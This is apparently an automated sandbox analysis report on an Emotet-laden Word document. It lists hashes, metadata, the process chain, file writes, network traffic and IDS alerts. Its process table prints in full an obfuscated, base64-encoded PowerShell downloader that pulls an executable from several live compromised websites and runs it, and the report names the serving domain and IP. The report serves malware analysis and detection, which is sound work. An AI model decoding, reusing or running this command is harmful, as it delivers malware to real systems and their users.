File name: | list_08112019_492.doc |
Full analysis: | https://app.any.run/tasks/da7ddaf9-395d-4796-b804-edc4a339a916 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2019, 15:54:04 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Quis vel quis., Author: Petronela Malekov, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 7 21:40:00 2019, Last Saved Time/Date: Thu Nov 7 21:40:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 175, Security: 0 |
MD5: | CF63DCBDAE87E5DBC64D7EACA7238876 |
SHA1: | 412775E3BF0928D474DAFEFA939974E8B66ECADE |
SHA256: | C63A71AB1CFA3A18D5CEDF5ABB143F438BCA30D9099965C7429EF1829AE9BBC5 |
SSDEEP: | 6144:IA8XtzqHNaq8SzGdD48+avOn5UsZyczsC6nH7:IA8XtzkaVWGe8+6Onzo86H7 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
HeadingPairs: |
|
---|---|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 204 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 175 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:11:07 21:40:00 |
CreateDate: | 2019:11:07 21:40:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Petronela Malíšeková |
Subject: | - |
Title: | Quis vel quis. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1704 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\list_08112019_492.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2488 | powershell -enco JABYAG4AcgB1AGgAdQBnAHYAPQAnAFQAcAB3AHYAdABzAHoAcwB0ACcAOwAkAEsAcgBnAHoAcgBtAHgAaAB2AHQAbwAgAD0AIAAnADQAMgAwACcAOwAkAEoAaABqAGwAcgBjAGoAeQBnAHkAPQAnAEYAdQBqAGoAZQB3AHYAdgBxAG0AJwA7ACQAVQB6AG4AdQBtAGQAaQBiAGQAbQBxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABLAHIAZwB6AHIAbQB4AGgAdgB0AG8AKwAnAC4AZQB4AGUAJwA7ACQAVQByAGQAcAB3AGEAdQBhAGYAbAA9ACcATAB3AGMAZABsAHYAeQB1AGYAbQAnADsAJABXAG4AaQB6AGwAeQBiAHoAeAB6AHgAbgB1AD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAFcARQBCAGMAbABpAEUATgB0ADsAJABDAGoAeQBmAGwAcABmAGgAagA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHUAawBoAHQAaQBuAGEAZABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADAANABrAHgAZgA5ADQALwAqAGgAdAB0AHAAOgAvAC8AcwBlAGEAdAB3AG8AbwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AYgA3AG8AOQA5ADQANgAyAC8AKgBoAHQAdABwADoALwAvAGEAYwBvAG4AcwB1AGwAdABhAG4AYwB5AC4AYwBvAG0ALwBJAE4AQwAvAG8AcgA1ADUANQAyADYAOQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGQAYQB2AGkAZABzAC4AYwBsAHUAYgAvAGMAYQBsAGUAbgBkAGEAcgAvAHMAMQBoADQANAAvACoAaAB0AHQAcAA6AC8ALwB0AG8AbgB5AG0AYwBuAGEAbQBhAHIAYQAuAHgAeQB6AC8AYwBnAGkALQBiAGkAbgAvAHgAaQAyAHIAMwA0AG0ANAA4AC8AJwAuACIAUwBgAHAATABJAFQAIgAoACcAKgAnACkAOwAkAEkAcQBuAHgAcABhAHYAeAB1AHkAcgBhAHkAPQAnAEcAZQBpAGYAdQBxAHoAeQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgB0AGQAZQBrAG0AbQB4AGEAbwBpAGMAZQAgAGkAbgAgACQAQwBqAHkAZgBsAHAAZgBoAGoAKQB7AHQAcgB5AHsAJABXAG4AaQB6AGwAeQBiAHoAeAB6AHgAbgB1AC4AIgBEAG8AdwBOAEwATwBgAEEAYABEAGYASQBsAEUAIgAoACQAQgB0AGQAZQBrAG0AbQB4AGEAbwBpAGMAZQAsACAAJABVAHoAbgB1AG0AZABpAGIAZABtAHEAKQA7ACQAUgBqAHUAbgBzAGUAaQBiAGUAZwBmAG0APQAnAEUAcABnAHAAbQBlAGMAZgBzAHQAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABVAHoAbgB1AG0AZABpAGIAZABtAHEAKQAuACIATABgAEUAbgBnAFQAaAAiACAALQBnAGUAIAAzADQAMgA2ADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGEAYABSAHQAIgAoACQAVQB6AG4AdQBtAGQAaQBiAGQAbQBxACkAOwAkAEcAdgBpAGoAcwBlAGQAeQByAGEAagBjAHUAPQAnAFQAbgB3AHQAZwB5AGIAZQBqAGsAbABkAHIAJwA7AGIAcgBlAGEAawA7ACQAQgB1AGIAaABiAGcAdgB4AG4AaQB0AD0AJwBQAHcAbgBzAHcAZABsAGUAeAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAcgB6AHkAZwBhAG0AbABhAHoAbwBhAG0APQAnAFgAcABpAGwAbgBsAG8AcABtAHgAdABoACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4028 | "C:\Users\admin\420.exe" | C:\Users\admin\420.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Exit code: 0 Version: 12.0.6606.1000 | ||||
3284 | --2e6e6c30 | C:\Users\admin\420.exe | 420.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Exit code: 0 Version: 12.0.6606.1000 | ||||
3028 | "C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe" | C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe | — | 420.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Version: 12.0.6606.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1704 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA795.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2488 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EE94KYJ2MTS8IO8A5FZP.temp | — | |
MD5:— | SHA256:— | |||
1704 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\805AB33E.wmf | wmf | |
MD5:3595DCAD3D4717336AAE70B3834F06CE | SHA256:7C1EEAB792C0407733315798B85B7EFCA1F47B047F9613BF21CDD96970161C9B | |||
1704 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BACF46EF.wmf | wmf | |
MD5:D86C4B914D3C7DF2E47D6648C15DCA27 | SHA256:927E16EA74C0CBF026FF28FB878DD7D68B869D1AF2CA851A8EB57E03AB9DF123 | |||
1704 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5EB31D58.wmf | wmf | |
MD5:FCB2EDDCB2634A6EB0B0F9CA00C37F85 | SHA256:008D7F69481F12971260D755005F421FA14795C9002D68318693A664A6AD5E02 | |||
1704 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8CFAA3AB.wmf | wmf | |
MD5:22DBAECBAE2A6EAD9A0C8FC70B0F478D | SHA256:77D7A40DA4A48BF589BB464D813EBEA128E6CBC699FF6EB3E70365CC2DF11264 | |||
1704 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EC8E5F1.wmf | wmf | |
MD5:B34F26304693D07384B1052C2C4948D7 | SHA256:EEA1836FCD5B10D31306A4F702D23B4D019DB5AACDF3B864A84724CC21ED09B4 | |||
1704 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36236526.wmf | wmf | |
MD5:5F07F6827F1F53DE0DB96BADD744E08E | SHA256:427A345C732A0A9F1A094253291C2593024DA1094633DA18720DC791DC33FAB6 | |||
1704 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A618D79.wmf | wmf | |
MD5:DE05D137CB8D0241E549D4B573FE0B9E | SHA256:06BA4869CE44C618742260C646F1DF479AB3B81BEDCE5304B134EC666E9705E4 | |||
1704 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:71834CB5A40FD067717E5E242FCFDDE2 | SHA256:053F9EECE736E49AA9E3C99DB635C70D83D2B9311D2D3CA8D612695DCF73376C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2488 | powershell.exe | GET | 200 | 111.68.116.163:80 | http://www.ukhtinada.com/wp-content/uploads/04kxf94/ | ID | executable | 113 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2488 | powershell.exe | 111.68.116.163:80 | www.ukhtinada.com | Varnion Technology Semesta, PT | ID | suspicious |
Domain | IP | Reputation |
---|---|---|
www.ukhtinada.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2488 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2488 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2488 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |